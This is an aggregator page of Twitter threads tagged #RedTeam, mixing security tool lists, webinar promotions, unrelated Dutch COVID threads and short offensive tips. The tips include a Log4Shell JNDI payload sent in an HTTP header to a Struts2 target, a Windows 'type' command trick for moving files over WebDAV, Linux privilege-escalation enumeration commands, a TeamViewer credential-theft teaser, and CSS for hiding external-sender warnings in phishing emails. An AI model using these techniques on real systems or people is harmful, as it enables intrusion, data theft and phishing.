Discover and read the best of Twitter Threads about #RedTeam

Most recents (24)

Red Team toolkit : 📢

#infosec #redteam #Hacking

RECONNAISSANCE:

- RustScan ==> lnkd.in/ebvRfBNy

- Amass ==> lnkd.in/e7V569N5

- CloudEnum ==> lnkd.in/ePHDeGZv

- Recon-NG ==> lnkd.in/edwaXFjS

- AttackSurfaceMapper ==> lnkd.in/ebbcj6Rm
INITIAL ACCESS:

- SprayingToolKit ==> lnkd.in/eBSAPz5z

- o365Recon ==> lnkd.in/eJwCx-Ga

- GadgetToJScript ==> lnkd.in/egPQBBXJ

- ThreatCheck ==> lnkd.in/eHvSPakR

- Freeze ==> lnkd.in/eNUh3zCi
DELIVERY:

- o365AttackToolKit ==> lnkd.in/etCCYi8y

- EvilGinx2 ==> lnkd.in/eRDPvwUg

- GoPhish ==> lnkd.in/ea26dfNg

- PwnAuth ==> lnkd.in/eqecM7de

- Modlishka ==> lnkd.in/eds-dR5C
Read 10 tweets
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
To host a simple python WebDAV server use wsgidav.
wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
github.com/mar10/wsgidav
If anyone knows how to have a webserver interpret the PROPFIND method as a GET method, I would be very interested in learning.
Read 4 tweets
Let's learn Red Teaming together
[Thread]🧵👇
Read 11 tweets
Red Team Resources 🖥

• Red Team Management by Joas
github.com/CyberSecurityU…

• Awesome Red Team by yeyintminthuhtut
github.com/yeyintminthuht…

• Awesome Red Team Operations by Joas
github.com/CyberSecurityU…

#cybersecurity #infosec #hacking #redteam
• Awesome Adversary Simulation Toolkit by 0x1
0x1.gitlab.io/pentesting/Red…

• Red/Purple Team by s0cm0nkey
s0cm0nkey.gitbook.io/s0cm0nkeys-sec…

• SpecterOps Red Team Blog
posts.specterops.io/tagged/red-tea…

• iRed Team Blog
ired.team/?trk=public_po…
• Red Team Tips Blog by Jean Maes
redteamer.tips

• Red Team Blog by Zach Stein
synzack.github.io

• Unstrustaland by João Paulo
untrustaland.com

• 100Security by Marcos Henrique
100security.com.br

• Red Team Village
redteamvillage.io
Read 4 tweets
Here's a list of free #PenetrationTesting and #RedTeam Labs you may set up in your own home to enhance your #hacking abilities :
1) Red Team Attack Lab
A simulated setting where red teams can practice exploiting #vulnerabilities in various operating systems.
lnkd.in/ernefQv8
2) Capsulecorp Pentest
#Capsulecorp is a lightweight virtual infrastructure operated using Vagrant and Ansible. One #Linux attacking system running #Xubuntu is included, along with four #Windows 2019 servers hosting a variety of #exploitable services.

lnkd.in/eYfGmNBe
Read 10 tweets
Dank zij @Rob_Roos is nu eindelijk voor iedereen (behalve @MarionKoopmans, @MarcBonten en nog zowat van die vaxdrammers) duidelijk wat voor ons 'wappies' al veel langer duidelijk was: vaccinatie had en heeft geen effect op transmissie. Een serieus draadje:
Het #coronatoegangsbewijs of #CTB of #QRcode was (en is) dus (altijd) gebaseerd (geweest) op een onwetenschappelijke aanname at best en een leugen at worst. Niettemin zijn op basis daarvan (a) miljoenen mensen maandenlang uitgesloten van grote delen van het sociale leven en ...
(b) werd op veel mensen ongeoorloofde druk uitgeoefend om zich toch maar te laten vaccineren, bijvoorbeeld om vakantie te kunnen of - in andere landen - om hun baan niet te verliezen of überhaupt boodschappen te kunnen doen. Oostenrijk had zelfs een vaccinatieplicht ingesteld.
Read 13 tweets
El Webinar Gratuito: "Explotación con Kali Linux" está disponible en video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Muchas Gracias @GogodinezGo por el retweet.
Gracias @RDSWEB por el retweet.
Read 7 tweets
#Webinar Gratuito: "Análisis Forense a Apache". Jueves 2 de Junio del 2022. De 5:00pm a 5:45pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Registro Libre en: reydes.com/d/?q=eventos
Muchas Gracias @Pumajosel por el retweet al Webinar Gratuito: "Análisis Forense a Apache". Jueves 2 de Junio del 2022.
Gracias @raumunz por el retweet al Webinar Gratuito: "Análisis Forense a Apache". Jueves 2 de Junio del 2022.
Read 11 tweets
El Webinar Gratuito: "Forense Digital a Sistemas Windows" está disponible en video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20…
Muchas Gracias @SilenusHack por el retweet.
Gracias @ciberconsejo por el retweet.
Read 11 tweets
Único #Curso Virtual Forense de Redes del año 2022. Domingos 5, 12, 19 y 26 de Junio. De 9:00 am a 12:00 pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Más información en: reydes.com/d/?q=Curso_For…
Muchas Gracias @JCarlosLV2014 por el retweet al Único Curso Virtual Forense de Redes del año 2022
Gracias @RDSWEB por el retweet al Único Curso Virtual Forense de Redes del año 2022
Read 12 tweets
Finalizamos la cuarta y última sesión del Único Curso Virtual de OSINT - Open Source Intelligence del año 2022. #hacking #cybersecurity #redteam #osint #forensics reydes.com/d/?q=Curso_de_… ¡Muchas Gracias a todos los participantes! Image
Muchas gracias @Infogon por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Gracias @pyth4gorean por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Read 11 tweets
Iniciamos la cuarta y última sesión del Único Curso Virtual de OSINT - Open Source Intelligence del año 2022. #hacking #cybersecurity #redteam #osint #forensics reydes.com/d/?q=Curso_de_… Image
Muchas Gracias @MarcosJLpezL1 por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Gracias @AFroufe por el retweet al Único Curso Virtual de OSINT - Open Source Intelligence del año 2022
Read 11 tweets
Único Curso Virtual Forense de Redes del año 2022. Domingos 5, 12, 19 y 26 de Junio. De 9:00 am a 12:00 pm (UTC -05:00). #hacking #cybersecurity #redteam #osint #forensics Más información en: reydes.com/d/?q=Curso_For…
Muchas gracias @MiguelJimenezMK por el retweet al Único Curso Virtual Forense de Redes del año 2022.
Gracias @carlaSaab777 por el retweet al Único Curso Virtual Forense de Redes del año 2022.
Read 7 tweets
El Webinar Gratuito: "Vulnerabilidades en CMS Web" está disponible en video. #hacking #cybersecurity #redteam #osint #forensics 🔒 reydes.com/d/?q=videos_20… Image
Muchas gracias @Infogon por el retweet.
Gracias @JCarlosLV2014 por el retweet.
Read 6 tweets
#SaveTheDate ! Le CReC @SaintCyrCoet organise le 14/06 une journée d’étude sur « Guerre et Fiction. Les effets de la fiction sur la conduite de la guerre ». @Inflexions10, @IRSEM1, @defense_ouest, @e_rioux, @mbourlet, @PhChapleau, @jean__michelin👇
Il s’agira notamment, avec la #RedTeam, @staillat, @ABRGLL, en présence de @JulienNocetti, @DidierDanet, @SandraCureau et de quelques autres, de renverser les perspectives :
Non pas la manière dont, de façon très attendue, la guerre inspire la fiction, mais comment les diverses formes de fiction influent sur la manière dont on fait (ou prépare) la guerre.
Read 5 tweets
== Trademark and Copyright Recon ==

How to find assets no other bug hunters have found.

One of my simple "secrets" for years.

Little automation exists for it.

💸💸💸

a thread🧵

🚨follow, retweet, & like for more hacker tips!🚨

1/x
When approaching a bounty, the scope is important. Not only the domain list but, all the text.

There are about ~30 paid bounty programs across the major platforms that are explicitly open scope or have the wording right under the scope section that says something like...

2/x
"If you find anything else that you believe to belong to XYZ company, report it and we will assess its validity. It may not result in a bounty"

But.. To be honest, criticals usually DO get paid.

3/x
Read 6 tweets
The Linux Privilege Escalation Cheatsheet... :)

Credits ~ @g0tmi1k

👇🏻🧵

#cybersecurity #infosec #linux #hacking #redteam
Operating System
What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a
Read 21 tweets
Deze hele draad, inclusief de reacties, geeft de onmacht aan van de manier waarop wij in NL de coronacrisis hebben aangepakt. Ook ik las het artikel waar @Gert_van_Dijk op aansloeg. 'Corona trof migranten en mensen met lage inkomens het hardst'. Nieuws dat geen nieuws was >
dit wisten we tenslotte al lang. Hier waarschuwden we steeds voor en hier probeerden we steeds zo goed mogelijk actie op te ondernemen, ook bij de GGD'en. De woede die @Ammer_B voelt, die voel ik ook. De onmacht. Je doet zo verschrikkelijk hard je best om het tij te keren, om >
je bijdrage te leveren. Dag en nacht hiermee bezig zijn. Niet omdat het je 'verdienmodel' is, maar omdat je het niet aan kunt zien dat steeds weer dezelfde groepen mensen de hardste klappen krijgen. En in dit geval waren de klappen héél erg hard. Als GGD-er zat ik al vrij snel >
Read 17 tweets
If you have a Struts2 target, you can try to find if its vulnerable to #Log4Shell

curl -vv -H "If-Modified-Since: \${jndi:ldap://localhost:80/abc}" http://localhost:8080/struts2-showcase/struts/utils.js

#bugbountytips #log4jRCE #bugbounty #infosec #cybersecurity #redteam 1/n Image
"DefaultStaticContentLoader" class which loads static assets in Struts2 logs a warning if the date passed in "If-Modified-Since" is invalid.

Reference:

attackerkb.com/topics/in9sPR2…

2/n
List of default static asset paths in Struts2 (taken from the Rapid7 analysis):

tooltip.gif
domtt.css
utils.js
domTT.js
inputtransfersselect.js
optiontransferselect.js

3/n
Read 3 tweets
A really really long list of beginner Reverse Engineering resources I have found 🧵 (if you know others please post them below thankyou!) #infosec
Teaches some great tricks that reverse engineers use in order to 'crack' certain types of applications. octopuslabs.io/legend/blog/ar…
A great resource to have around, it endeavors in all you need to know and more! Not only does it teach you theories around the concepts of Reverse Engineering, it also applies practical application. beginners.re
Read 10 tweets
Quick 🧵of some of the insights and actions we're sharing with our customers based on Q2 '21 incident data.

TL;DR:
- #BEC in O365 is a huge problem. MFA everywhere, disable legacy protocols.
- We’re 👀 more ransomware attacks. Reduce/control the self-install attack surface.
Insight: #BEC attempts in 0365 was the top threat in Q2 accounting for nearly 50% of the incidents we identified

Actions:
- MFA everywhere you can
- Disable legacy protocols
- Implement conditional access policies
- Consider Azure Identity Protection or MCAS
re: Azure Identity Protection & MCAS: They build data models for each user, making it easier to spot atypical auth events. Also, better logging. There's $ to consider here, I get it. Merely providing practitioner's perspective. They're worth a look if you're struggling with BEC.
Read 13 tweets
🧵on stealing TeamViewer credentials

Many organizations have systems with TeamViewer actively running; some know it and manage it correctly, other have no idea it is running or where. The latter probably have multiple versions #redteam #blueteam #purpleteam #ThreatThursday 1/10
I started looking deeper into TeamViewer when @snlyngaas reported that a Florida water facility had been breached. A malicious actor used TeamViewer to login and change the levels of sodium hydroxide. The plant operator say this and no damage was done cyberscoop.com/florida-water-… 2/10
For those that speak @MITREattack we are talking about T1078 Valid Accounts: attack.mitre.org/techniques/T10…
But how were these credentials obtained? We don't know but @brysonbort spoke with #RSAC about it if you want more on the Florida water plant breach: 3/10
Read 10 tweets
idk why I havent thought of this before, but its very easy to hide those "external sender" warnings that get appended to your emails during phishing campaigns 🤔. Email gateways/FW just add HTML at the start/end of emails, simply add CSS to hide it! #RedTeam

See images:
The showcased HTML should handle most generic warnings out there, might have to tweak it a little if your template interferes with it (ie if your template leverages <table>)
A good mitigation is to use solutions like these, if you can techcommunity.microsoft.com/t5/exchange-te…

Not sure if other email providers use it, but it shows the email is external from within the client's UI which is neat... can't be modified by the email HTML obviously.
Read 3 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!